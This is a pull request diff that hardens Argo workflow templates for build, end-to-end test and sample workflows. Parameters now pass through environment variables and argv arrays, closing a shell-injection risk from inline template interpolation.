### PR TITLE
fix: use env variables for parameters in build/e2e/sample workflow templates

### DIFF
--- a/install/k3d/build-cache/workflow-templates/ballerina-buildpack-build.yaml
+++ b/install/k3d/build-cache/workflow-templates/ballerina-buildpack-build.yaml
@@ -29,18 +29,28 @@ spec:
             optional: true
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.2
+        env:
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: APP_PATH
+            value: '{{workflow.parameters.app-path}}'
+          - name: BUILD_ENV_JSON
+            value: '{{inputs.parameters.build-env}}'
+          - name: CACHE_REGISTRY
+            value: '{{inputs.parameters.build-cache}}'
+          - name: CACHE_LAYERS_MODE
+            value: '{{inputs.parameters.cache-layers-mode}}'
         command: [sh, -c]
         args:
           - |-
             set -e
 
             WORKDIR=/mnt/vol/source
-            GIT_REVISION="{{inputs.parameters.git-revision}}"
-            IMAGE="{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
-            APP_PATH="{{workflow.parameters.app-path}}"
-            BUILD_ENV_JSON='{{inputs.parameters.build-env}}'
-            CACHE_REGISTRY="{{inputs.parameters.build-cache}}"
-            CACHE_LAYERS_MODE="{{inputs.parameters.cache-layers-mode}}"
+            IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             case "$CACHE_LAYERS_MODE" in disabled|reuse|rebuild) ;; *) echo ">> Error: invalid cache layers mode '$CACHE_LAYERS_MODE'"; exit 1 ;; esac
 
@@ -97,9 +107,14 @@ spec:
             # ghcr.io/openchoreo/buildpack/ballerina:18-run
             RUN_IMAGE="ghcr.io/openchoreo/buildpack/ballerina@sha256:121499416443e19dcb43a22e7acfa246d29427a978a43b29b5b4e7a8385b222c"
 
-            ENV_ARGS=""
+            # Build --env flags as argv entries, not shell fragments.
+            set --
             if [ -n "$BUILD_ENV_JSON" ] && [ "$BUILD_ENV_JSON" != "[]" ]; then
-              ENV_ARGS=$(echo "$BUILD_ENV_JSON" | jq -r '.[] | "--env \(.name)=\(.value)"' | tr '\n' ' ')
+              while IFS= read -r kv; do
+                [ -n "$kv" ] && set -- "$@" --env "$kv"
+              done <<EOF
+            $(printf '%s' "$BUILD_ENV_JSON" | jq -r '.[] | "\(.name)=\(.value)"')
+            EOF
             fi
 
             CACHE_AVAILABLE="false"
@@ -122,8 +137,8 @@ spec:
             fi
 
             if [ "$CACHE_AVAILABLE" = "true" ] && [ "$CACHE_LAYERS_MODE" != "disabled" ]; then
-              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/{{workflow.parameters.image-name}}:cnb-cache"
-              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
+              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/${IMAGE_NAME}:cnb-cache"
+              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
               CLEAR_CACHE_ARG=""
               if [ "$CACHE_LAYERS_MODE" = "rebuild" ]; then CLEAR_CACHE_ARG="--clear-cache"; fi
 
@@ -137,7 +152,7 @@ spec:
                 $PACK_REGISTRY_ARGS \
                 --cache-image "$CACHE_IMAGE" \
                 $CLEAR_CACHE_ARG \
-                $ENV_ARGS
+                "$@"
 
               podman pull --tls-verify=false "$PUBLISH_REF"
               podman tag "$PUBLISH_REF" "$IMAGE"
@@ -153,7 +168,7 @@ spec:
               --volume "/generated-artifacts:/app/generated-artifacts:rw" \
               --pull-policy always \
               $PACK_REGISTRY_ARGS \
-              $ENV_ARGS
+              "$@"
 
             until podman image exists "$IMAGE" 2>/dev/null; do sleep 1; done
             podman save -o /mnt/vol/app-image.tar "$IMAGE"

--- a/install/k3d/build-cache/workflow-templates/containerfile-build.yaml
+++ b/install/k3d/build-cache/workflow-templates/containerfile-build.yaml
@@ -25,6 +25,25 @@ spec:
             optional: true
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.2
+        env:
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: DOCKER_CONTEXT
+            value: '{{workflow.parameters.docker-context}}'
+          - name: DOCKERFILE_PATH
+            value: '{{workflow.parameters.dockerfile-path}}'
+          - name: BUILD_ENV_JSON
+            value: '{{inputs.parameters.build-env}}'
+          - name: BUILD_ARGS_JSON
+            value: '{{inputs.parameters.build-args}}'
+          - name: CACHE_REGISTRY
+            value: '{{inputs.parameters.build-cache}}'
+          - name: CACHE_LAYERS_MODE
+            value: '{{inputs.parameters.cache-layers-mode}}'
         command:
           - sh
           - -c
@@ -33,13 +52,7 @@ spec:
             set -e
 
             WORKDIR="/mnt/vol/source"
-            IMAGE="{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-{{inputs.parameters.git-revision}}"
-            DOCKER_CONTEXT="{{workflow.parameters.docker-context}}"
-            DOCKERFILE_PATH="{{workflow.parameters.dockerfile-path}}"
-            BUILD_ENV_JSON='{{inputs.parameters.build-env}}'
-            BUILD_ARGS_JSON='{{inputs.parameters.build-args}}'
-            CACHE_REGISTRY="{{inputs.parameters.build-cache}}"
-            CACHE_LAYERS_MODE="{{inputs.parameters.cache-layers-mode}}"
+            IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             echo ">> Image: $IMAGE"
             echo ">> Dockerfile: $DOCKERFILE_PATH"
@@ -78,18 +91,25 @@ spec:
             [storage.options.overlay]
             STEOF
 
-            ENV_ARGS=""
+            # Build --env and --build-arg flags as argv entries, not shell fragments.
+            set --
             if [ -n "$BUILD_ENV_JSON" ] && [ "$BUILD_ENV_JSON" != "[]" ]; then
-              ENV_ARGS=$(echo "$BUILD_ENV_JSON" | jq -r '.[] | "--env \(.name)=\(.value)"' | tr '\n' ' ')
+              while IFS= read -r kv; do
+                [ -n "$kv" ] && set -- "$@" --env "$kv"
+              done <<EOF
+            $(printf '%s' "$BUILD_ENV_JSON" | jq -r '.[] | "\(.name)=\(.value)"')
+            EOF
             fi
 
-            BUILD_ARG_ARGS=""
             if [ -n "$BUILD_ARGS_JSON" ] && [ "$BUILD_ARGS_JSON" != "[]" ]; then
-              BUILD_ARG_ARGS=$(echo "$BUILD_ARGS_JSON" | jq -r '.[] | "--build-arg \(.name)=\(.value)"' | tr '\n' ' ')
+              while IFS= read -r kv; do
+                [ -n "$kv" ] && set -- "$@" --build-arg "$kv"
+              done <<EOF
+            $(printf '%s' "$BUILD_ARGS_JSON" | jq -r '.[] | "\(.name)=\(.value)"')
+            EOF
             fi
 
             CACHE_AVAILABLE="false"
-            CACHE_ARGS=""
             if [ -n "$CACHE_REGISTRY" ] && [ "$CACHE_REGISTRY" != "none" ]; then
               if curl -sf --connect-timeout 3 "http://${CACHE_REGISTRY}/v2/" >/dev/null 2>&1; then
                 CACHE_AVAILABLE="true"
@@ -107,14 +127,14 @@ spec:
             fi
 
             if [ "$CACHE_AVAILABLE" = "true" ] && [ "$CACHE_LAYERS_MODE" != "disabled" ]; then
-              CACHE_REF="${CACHE_REGISTRY}/build-cache/containerfile/{{workflow.parameters.image-name}}"
+              CACHE_REF="${CACHE_REGISTRY}/build-cache/containerfile/${IMAGE_NAME}"
               case "$CACHE_LAYERS_MODE" in
                 reuse)
-                  CACHE_ARGS="--layers --cache-from=${CACHE_REF} --cache-to=${CACHE_REF} --cache-ttl=168h"
+                  set -- "$@" --layers "--cache-from=${CACHE_REF}" "--cache-to=${CACHE_REF}" --cache-ttl=168h
                   echo ">> Layer cache: reuse ${CACHE_REF}"
                   ;;
                 rebuild)
-                  CACHE_ARGS="--layers --cache-to=${CACHE_REF} --cache-ttl=168h"
+                  set -- "$@" --layers "--cache-to=${CACHE_REF}" --cache-ttl=168h
                   echo ">> Layer cache: rebuild ${CACHE_REF}"
                   ;;
               esac
@@ -125,9 +145,9 @@ spec:
             fi
 
             echo ">> Building image"
-            podman build -t $IMAGE -f $WORKDIR/$DOCKERFILE_PATH $ENV_ARGS $BUILD_ARG_ARGS $CACHE_ARGS $WORKDIR/$DOCKER_CONTEXT
+            podman build -t "$IMAGE" -f "$WORKDIR/$DOCKERFILE_PATH" "$@" -- "$WORKDIR/$DOCKER_CONTEXT"
             echo ">> Image built successfully"
-            podman save -o /mnt/vol/app-image.tar $IMAGE
+            podman save -o /mnt/vol/app-image.tar "$IMAGE"
         securityContext:
           privileged: true
         volumeMounts:

--- a/install/k3d/build-cache/workflow-templates/gcp-buildpacks-build.yaml
+++ b/install/k3d/build-cache/workflow-templates/gcp-buildpacks-build.yaml
@@ -23,18 +23,28 @@ spec:
             optional: true
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.2
+        env:
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: APP_PATH
+            value: '{{workflow.parameters.app-path}}'
+          - name: BUILD_ENV_JSON
+            value: '{{workflow.parameters.build-env}}'
+          - name: CACHE_REGISTRY
+            value: '{{inputs.parameters.build-cache}}'
+          - name: CACHE_LAYERS_MODE
+            value: '{{inputs.parameters.cache-layers-mode}}'
         command: [sh, -c]
         args:
           - |-
             set -e
 
             WORKDIR=/mnt/vol/source
-            GIT_REVISION="{{inputs.parameters.git-revision}}"
-            IMAGE="{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
-            APP_PATH="{{workflow.parameters.app-path}}"
-            BUILD_ENV_JSON='{{workflow.parameters.build-env}}'
-            CACHE_REGISTRY="{{inputs.parameters.build-cache}}"
-            CACHE_LAYERS_MODE="{{inputs.parameters.cache-layers-mode}}"
+            IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             case "$CACHE_LAYERS_MODE" in disabled|reuse|rebuild) ;; *) echo ">> Error: invalid cache layers mode '$CACHE_LAYERS_MODE'"; exit 1 ;; esac
 
@@ -89,9 +99,14 @@ spec:
             BUILDER="gcr.io/buildpacks/builder@sha256:5977b4bd47d3e9ff729eefe9eb99d321d4bba7aa3b14986323133f40b622aef1"
             RUN_IMG="gcr.io/buildpacks/google-22/run@sha256:a8ccb6641b4d98b0adf6397f954e7194611d1ae61310f0561f1c00fdf7f9ba96"
 
-            ENV_ARGS=""
+            # Build --env flags as argv entries, not shell fragments.
+            set --
             if [ -n "$BUILD_ENV_JSON" ] && [ "$BUILD_ENV_JSON" != "[]" ]; then
-              ENV_ARGS=$(echo "$BUILD_ENV_JSON" | jq -r '.[] | "--env \(.name)=\(.value)"' | tr '\n' ' ')
+              while IFS= read -r kv; do
+                [ -n "$kv" ] && set -- "$@" --env "$kv"
+              done <<EOF
+            $(printf '%s' "$BUILD_ENV_JSON" | jq -r '.[] | "\(.name)=\(.value)"')
+            EOF
             fi
 
             CACHE_AVAILABLE="false"
@@ -114,8 +129,8 @@ spec:
             fi
 
             if [ "$CACHE_AVAILABLE" = "true" ] && [ "$CACHE_LAYERS_MODE" != "disabled" ]; then
-              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/{{workflow.parameters.image-name}}:cnb-cache"
-              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
+              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/${IMAGE_NAME}:cnb-cache"
+              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
               CLEAR_CACHE_ARG=""
               if [ "$CACHE_LAYERS_MODE" = "rebuild" ]; then CLEAR_CACHE_ARG="--clear-cache"; fi
 
@@ -128,7 +143,7 @@ spec:
                 $PACK_REGISTRY_ARGS \
                 --cache-image "$CACHE_IMAGE" \
                 $CLEAR_CACHE_ARG \
-                $ENV_ARGS
+                "$@"
 
               podman pull --tls-verify=false "$PUBLISH_REF"
               podman tag "$PUBLISH_REF" "$IMAGE"
@@ -143,7 +158,7 @@ spec:
               --path "$WORKDIR/$APP_PATH" \
               --pull-policy always \
               $PACK_REGISTRY_ARGS \
-              $ENV_ARGS
+              "$@"
 
             until podman image exists "$IMAGE" 2>/dev/null; do sleep 1; done
             podman save -o /mnt/vol/app-image.tar "$IMAGE"

--- a/install/k3d/build-cache/workflow-templates/paketo-buildpacks-build.yaml
+++ b/install/k3d/build-cache/workflow-templates/paketo-buildpacks-build.yaml
@@ -23,18 +23,28 @@ spec:
             optional: true
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.2
+        env:
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: APP_PATH
+            value: '{{workflow.parameters.app-path}}'
+          - name: BUILD_ENV_JSON
+            value: '{{workflow.parameters.build-env}}'
+          - name: CACHE_REGISTRY
+            value: '{{inputs.parameters.build-cache}}'
+          - name: CACHE_LAYERS_MODE
+            value: '{{inputs.parameters.cache-layers-mode}}'
         command: [sh, -c]
         args:
           - |-
             set -e
 
             WORKDIR=/mnt/vol/source
-            GIT_REVISION="{{inputs.parameters.git-revision}}"
-            IMAGE="{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
-            APP_PATH="{{workflow.parameters.app-path}}"
-            BUILD_ENV_JSON='{{workflow.parameters.build-env}}'
-            CACHE_REGISTRY="{{inputs.parameters.build-cache}}"
-            CACHE_LAYERS_MODE="{{inputs.parameters.cache-layers-mode}}"
+            IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             case "$CACHE_LAYERS_MODE" in disabled|reuse|rebuild) ;; *) echo ">> Error: invalid cache layers mode '$CACHE_LAYERS_MODE'"; exit 1 ;; esac
 
@@ -91,9 +101,14 @@ spec:
             # docker.io/paketobuildpacks/run-jammy-full:0.1.130
             RUN_IMG="docker.io/paketobuildpacks/run-jammy-full@sha256:84a29ab400de17994da1270742de91718658dfbe4713cae9b765f0c9e1062eac"
 
-            ENV_ARGS=""
+            # Build --env flags as argv entries, not shell fragments.
+            set --
             if [ -n "$BUILD_ENV_JSON" ] && [ "$BUILD_ENV_JSON" != "[]" ]; then
-              ENV_ARGS=$(echo "$BUILD_ENV_JSON" | jq -r '.[] | "--env \(.name)=\(.value)"' | tr '\n' ' ')
+              while IFS= read -r kv; do
+                [ -n "$kv" ] && set -- "$@" --env "$kv"
+              done <<EOF
+            $(printf '%s' "$BUILD_ENV_JSON" | jq -r '.[] | "\(.name)=\(.value)"')
+            EOF
             fi
 
             CACHE_AVAILABLE="false"
@@ -116,8 +131,8 @@ spec:
             fi
 
             if [ "$CACHE_AVAILABLE" = "true" ] && [ "$CACHE_LAYERS_MODE" != "disabled" ]; then
-              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/{{workflow.parameters.image-name}}:cnb-cache"
-              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/{{workflow.parameters.image-name}}:{{workflow.parameters.image-tag}}-${GIT_REVISION}"
+              CACHE_IMAGE="${CACHE_REGISTRY}/build-cache/cnb/${IMAGE_NAME}:cnb-cache"
+              PUBLISH_REF="${CACHE_REGISTRY}/build-tmp/cnb/${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
               CLEAR_CACHE_ARG=""
               if [ "$CACHE_LAYERS_MODE" = "rebuild" ]; then CLEAR_CACHE_ARG="--clear-cache"; fi
 
@@ -130,7 +145,7 @@ spec:
                 $PACK_REGISTRY_ARGS \
                 --cache-image "$CACHE_IMAGE" \
                 $CLEAR_CACHE_ARG \
-                $ENV_ARGS
+                "$@"
 
               podman pull --tls-verify=false "$PUBLISH_REF"
               podman tag "$PUBLISH_REF" "$IMAGE"
@@ -145,7 +160,7 @@ spec:
               --path "$WORKDIR/$APP_PATH" \
               --pull-policy always \
               $PACK_REGISTRY_ARGS \
-              $ENV_ARGS
+              "$@"
 
             until podman image exists "$IMAGE" 2>/dev/null; do sleep 1; done
             podman save -o /mnt/vol/app-image.tar "$IMAGE"

--- a/samples/workflows/aws-rds-postgres/aws-rds-postgres-create.yaml
+++ b/samples/workflows/aws-rds-postgres/aws-rds-postgres-create.yaml
@@ -249,6 +249,9 @@ spec:
     - name: report-step
       container:
         image: alpine:3
+        env:
+          - name: CREDENTIALS_SECRET
+            value: '{{workflow.parameters.credentials-secret}}'
         command: [sh, -c]
         args:
           - |
@@ -280,10 +283,10 @@ spec:
             echo "Connection String (template):"
             echo "  ${CONN_STRING_TEMPLATE}"
             echo ""
-            echo "NOTE: Password is stored in the '{{workflow.parameters.credentials-secret}}'"
+            echo "NOTE: Password is stored in the '${CREDENTIALS_SECRET}'"
             echo "      Kubernetes Secret under the 'dbPassword' key."
             echo "      Retrieve it with:"
-            echo "      kubectl get secret {{workflow.parameters.credentials-secret}} \\"
+            echo "      kubectl get secret ${CREDENTIALS_SECRET} \\"
             echo "        -o jsonpath='{.data.dbPassword}' | base64 -d"
             echo "================================================="
             echo ""

--- a/samples/workflows/azure-sql-database/azure-sql-database-create.yaml
+++ b/samples/workflows/azure-sql-database/azure-sql-database-create.yaml
@@ -303,6 +303,9 @@ spec:
     - name: report-step
       container:
         image: alpine:3
+        env:
+          - name: CREDENTIALS_SECRET
+            value: '{{workflow.parameters.credentials-secret}}'
         command: [sh, -c]
         args:
           - |
@@ -335,10 +338,10 @@ spec:
             echo "Connection String (template):"
             echo "  ${CONN_STRING}"
             echo ""
-            echo "NOTE: Password is stored in the '{{workflow.parameters.credentials-secret}}'"
+            echo "NOTE: Password is stored in the '${CREDENTIALS_SECRET}'"
             echo "      Kubernetes Secret under the 'adminPassword' key."
             echo "      Retrieve it with:"
-            echo "      kubectl get secret {{workflow.parameters.credentials-secret}} \\"
+            echo "      kubectl get secret ${CREDENTIALS_SECRET} \\"
             echo "        -o jsonpath='{.data.adminPassword}' | base64 -d"
             echo "================================================="
             echo ""

--- a/samples/workflows/custom-steps/linter/spectral-lint.yaml
+++ b/samples/workflows/custom-steps/linter/spectral-lint.yaml
@@ -12,6 +12,11 @@ spec:
           - name: ruleset-path
       container:
         image: node:20-alpine
+        env:
+          - name: API_SPEC_PATH
+            value: '{{inputs.parameters.api-spec-path}}'
+          - name: RULESET_PATH
+            value: '{{inputs.parameters.ruleset-path}}'
         command:
           - sh
           - -c
@@ -20,8 +25,6 @@ spec:
             set -e
 
             WORKDIR="/mnt/vol/source"
-            API_SPEC_PATH="{{inputs.parameters.api-spec-path}}"
-            RULESET_PATH="{{inputs.parameters.ruleset-path}}"
 
             echo ">> Installing Spectral and OWASP ruleset"
             npm install -g @stoplight/spectral-cli @stoplight/spectral-owasp-ruleset

--- a/samples/workflows/github-stats-report/cluster-workflow-template-github-stats-report.yaml
+++ b/samples/workflows/github-stats-report/cluster-workflow-template-github-stats-report.yaml
@@ -22,13 +22,15 @@ spec:
     - name: fetch-step
       container:
         image: curlimages/curl:8.8.0
+        env:
+          - name: ORG
+            value: '{{workflow.parameters.org}}'
+          - name: REPO
+            value: '{{workflow.parameters.repo}}'
         command: [sh, -c]
         args:
           - |
             set -e
-            ORG="{{workflow.parameters.org}}"
-            REPO="{{workflow.parameters.repo}}"
-
             echo "Fetching stats for ${ORG}/${REPO} ..."
             curl -sf \
               -H "Accept: application/vnd.github+json" \
@@ -76,12 +78,14 @@ spec:
           - name: output-format
       container:
         image: alpine:3
+        env:
+          - name: FORMAT
+            value: '{{inputs.parameters.output-format}}'
         command: [sh, -c]
         args:
           - |
             set -e
             apk add --no-cache jq -q
-            FORMAT="{{inputs.parameters.output-format}}"
 
             if [ "$FORMAT" = "json" ]; then
               cat /mnt/data/stats.json

--- a/samples/workflows/scm-create-repo/codecommit-create-repo.yaml
+++ b/samples/workflows/scm-create-repo/codecommit-create-repo.yaml
@@ -24,10 +24,6 @@ spec:
         args:
           - |
             set -e
-            REPO_NAME="{{workflow.parameters.repo-name}}"
-            DESCRIPTION="{{workflow.parameters.description}}"
-            REGION="{{workflow.parameters.region}}"
-
             echo "Creating CodeCommit repository ${REPO_NAME} in region ${REGION} ..."
             aws codecommit create-repository \
               --repository-name "$REPO_NAME" \
@@ -37,6 +33,12 @@ spec:
 
             echo "Repository creation request complete."
         env:
+          - name: REPO_NAME
+            value: '{{workflow.parameters.repo-name}}'
+          - name: DESCRIPTION
+            value: '{{workflow.parameters.description}}'
+          - name: REGION
+            value: '{{workflow.parameters.region}}'
           - name: AWS_ACCESS_KEY_ID
             valueFrom:
               secretKeyRef:

--- a/samples/workflows/scm-create-repo/github-create-repo.yaml
+++ b/samples/workflows/scm-create-repo/github-create-repo.yaml
@@ -24,13 +24,6 @@ spec:
         args:
           - |
             set -e
-            OWNER="{{workflow.parameters.owner}}"
-            REPO_NAME="{{workflow.parameters.repo-name}}"
-            DESCRIPTION="{{workflow.parameters.description}}"
-            VISIBILITY="{{workflow.parameters.visibility}}"
-            AUTO_INIT="{{workflow.parameters.auto-init}}"
-            GITIGNORE_TEMPLATE="{{workflow.parameters.gitignore-template}}"
-            LICENSE_TEMPLATE="{{workflow.parameters.license-template}}"
 
             IS_PRIVATE="false"
             if [ "$VISIBILITY" = "private" ]; then
@@ -60,6 +53,20 @@ spec:
 
             echo "Repository creation request complete."
         env:
+          - name: OWNER
+            value: '{{workflow.parameters.owner}}'
+          - name: REPO_NAME
+            value: '{{workflow.parameters.repo-name}}'
+          - name: DESCRIPTION
+            value: '{{workflow.parameters.description}}'
+          - name: VISIBILITY
+            value: '{{workflow.parameters.visibility}}'
+          - name: AUTO_INIT
+            value: '{{workflow.parameters.auto-init}}'
+          - name: GITIGNORE_TEMPLATE
+            value: '{{workflow.parameters.gitignore-template}}'
+          - name: LICENSE_TEMPLATE
+            value: '{{workflow.parameters.license-template}}'
           - name: GITHUB_TOKEN
             valueFrom:
               secretKeyRef:

--- a/test/e2e/k3d/multi-cluster/workflow-templates/generate-workload-e2e-mc.yaml
+++ b/test/e2e/k3d/multi-cluster/workflow-templates/generate-workload-e2e-mc.yaml
@@ -37,19 +37,39 @@ spec:
             default: "api.e2e-mc-cp.local"
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.1
+        env:
+          - name: IMAGE
+            value: '{{inputs.parameters.image}}'
+          - name: RUN_NAME
+            value: '{{inputs.parameters.run-name}}'
+          - name: PROJECT_NAME
+            value: '{{workflow.parameters.project-name}}'
+          - name: COMPONENT_NAME
+            value: '{{workflow.parameters.component-name}}'
+          - name: NAMESPACE_NAME
+            value: '{{workflow.parameters.namespace-name}}'
+          - name: APP_PATH
+            value: '{{workflow.parameters.app-path}}'
+          - name: OAUTH_URL
+            value: '{{inputs.parameters.oauth-token-url}}'
+          - name: OAUTH_HOST
+            value: '{{inputs.parameters.oauth-host-header}}'
+          - name: CLIENT_ID
+            value: '{{inputs.parameters.oauth-client-id}}'
+          - name: CLIENT_SECRET
+            value: '{{inputs.parameters.oauth-client-secret}}'
+          - name: OAUTH_SCOPE
+            value: '{{inputs.parameters.oauth-scope}}'
+          - name: API_URL
+            value: '{{inputs.parameters.api-server-url}}'
+          - name: API_HOST
+            value: '{{inputs.parameters.api-server-host-header}}'
         command:
           - sh
           - -c
         args:
           - |-
             set -e
-
-            IMAGE={{inputs.parameters.image}}
-            RUN_NAME={{inputs.parameters.run-name}}
-            PROJECT_NAME={{workflow.parameters.project-name}}
-            COMPONENT_NAME={{workflow.parameters.component-name}}
-            NAMESPACE_NAME={{workflow.parameters.namespace-name}}
-            APP_PATH="{{workflow.parameters.app-path}}"
 
             DESCRIPTOR_PATH="/mnt/vol/source${APP_PATH:+/${APP_PATH#/}}"
             OUTPUT_PATH="/mnt/vol/workload-cr.yaml"
@@ -84,7 +104,7 @@ spec:
               WORKLOAD_FROM_SOURCE="true"
               echo ">> Generating workload CR from workload descriptor"
               podman run --rm --network=none \
-              -v $DESCRIPTOR_PATH:/app:rw -w /app \
+              -v "$DESCRIPTOR_PATH:/app:rw" -w /app \
               ghcr.io/openchoreo/openchoreo-cli@sha256:9d5e9a52205b3a9998a2af18b93aae31c2668d3832c8138f6d6875c4743b7f96 \
                 workload create \
                 --namespace "${NAMESPACE_NAME}" \
@@ -96,7 +116,7 @@ spec:
             else
               echo ">> Generating default workload CR"
               podman run --rm --network=none \
-              -v $DESCRIPTOR_PATH:/app:rw -w /app \
+              -v "$DESCRIPTOR_PATH:/app:rw" -w /app \
               ghcr.io/openchoreo/openchoreo-cli@sha256:9d5e9a52205b3a9998a2af18b93aae31c2668d3832c8138f6d6875c4743b7f96 \
                 workload create \
                 --namespace "${NAMESPACE_NAME}" \
@@ -118,12 +138,6 @@ spec:
               > /mnt/vol/workload-cr.json
             echo ">> Generated workload JSON payload:"
             cat /mnt/vol/workload-cr.json
-
-            OAUTH_URL="{{inputs.parameters.oauth-token-url}}"
-            OAUTH_HOST="{{inputs.parameters.oauth-host-header}}"
-            CLIENT_ID="{{inputs.parameters.oauth-client-id}}"
-            CLIENT_SECRET="{{inputs.parameters.oauth-client-secret}}"
-            OAUTH_SCOPE="{{inputs.parameters.oauth-scope}}"
 
             echo ">> Requesting OAuth token from ${OAUTH_URL}"
             if [ -n "${OAUTH_SCOPE}" ]; then
@@ -151,9 +165,6 @@ spec:
             fi
 
             echo ">> Successfully obtained access token"
-
-            API_URL="{{inputs.parameters.api-server-url}}"
-            API_HOST="{{inputs.parameters.api-server-host-header}}"
 
             WORKLOAD_NAME=$(podman run --rm -v /mnt/vol:/data:ro mikefarah/yq:4.45.4 -r '.metadata.name' /data/workload-cr.json)
 

--- a/test/e2e/k3d/multi-cluster/workflow-templates/publish-image-e2e-mc.yaml
+++ b/test/e2e/k3d/multi-cluster/workflow-templates/publish-image-e2e-mc.yaml
@@ -32,6 +32,13 @@ spec:
             secretName: '{{workflow.parameters.registry-push-secret}}'
       container:
         image: ghcr.io/openchoreo/podman-runner@sha256:2165f0d5ca5c8286c234388d542f50ede8f38108fc25a57ce141fcdf5cc87b00
+        env:
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
         command:
           - sh
           - -c
@@ -39,9 +46,6 @@ spec:
           - |-
             set -e
 
-            GIT_REVISION={{inputs.parameters.git-revision}}
-            IMAGE_NAME={{workflow.parameters.image-name}}
-            IMAGE_TAG={{workflow.parameters.image-tag}}
             SRC_IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             REGISTRY_ENDPOINT="host.k3d.internal:30082"
@@ -68,13 +72,13 @@ spec:
 
             podman load -i /mnt/vol/app-image.tar
 
-            podman tag $SRC_IMAGE $REGISTRY_ENDPOINT/$SRC_IMAGE
+            podman tag "$SRC_IMAGE" "$REGISTRY_ENDPOINT/$SRC_IMAGE"
 
             echo ">> Pushing image to registry"
             if [ -f "$AUTH_FILE" ]; then
-              podman push --tls-verify=false --authfile "$AUTH_FILE" $REGISTRY_ENDPOINT/$SRC_IMAGE
+              podman push --tls-verify=false --authfile "$AUTH_FILE" "$REGISTRY_ENDPOINT/$SRC_IMAGE"
             else
-              podman push --tls-verify=false $REGISTRY_ENDPOINT/$SRC_IMAGE
+              podman push --tls-verify=false "$REGISTRY_ENDPOINT/$SRC_IMAGE"
             fi
 
             echo ">> Image published successfully: $REGISTRY_ENDPOINT/$SRC_IMAGE"

--- a/test/e2e/k3d/workflow-templates/generate-workload-e2e.yaml
+++ b/test/e2e/k3d/workflow-templates/generate-workload-e2e.yaml
@@ -41,19 +41,39 @@ spec:
             default: "api.e2e-cp.local"
       container:
         image: ghcr.io/openchoreo/podman-runner:v1.1
+        env:
+          - name: IMAGE
+            value: '{{inputs.parameters.image}}'
+          - name: RUN_NAME
+            value: '{{inputs.parameters.run-name}}'
+          - name: PROJECT_NAME
+            value: '{{workflow.parameters.project-name}}'
+          - name: COMPONENT_NAME
+            value: '{{workflow.parameters.component-name}}'
+          - name: NAMESPACE_NAME
+            value: '{{workflow.parameters.namespace-name}}'
+          - name: APP_PATH
+            value: '{{workflow.parameters.app-path}}'
+          - name: OAUTH_URL
+            value: '{{inputs.parameters.oauth-token-url}}'
+          - name: OAUTH_HOST
+            value: '{{inputs.parameters.oauth-host-header}}'
+          - name: CLIENT_ID
+            value: '{{inputs.parameters.oauth-client-id}}'
+          - name: CLIENT_SECRET
+            value: '{{inputs.parameters.oauth-client-secret}}'
+          - name: OAUTH_SCOPE
+            value: '{{inputs.parameters.oauth-scope}}'
+          - name: API_URL
+            value: '{{inputs.parameters.api-server-url}}'
+          - name: API_HOST
+            value: '{{inputs.parameters.api-server-host-header}}'
         command:
           - sh
           - -c
         args:
           - |-
             set -e
-
-            IMAGE={{inputs.parameters.image}}
-            RUN_NAME={{inputs.parameters.run-name}}
-            PROJECT_NAME={{workflow.parameters.project-name}}
-            COMPONENT_NAME={{workflow.parameters.component-name}}
-            NAMESPACE_NAME={{workflow.parameters.namespace-name}}
-            APP_PATH="{{workflow.parameters.app-path}}"
 
             DESCRIPTOR_PATH="/mnt/vol/source${APP_PATH:+/${APP_PATH#/}}"
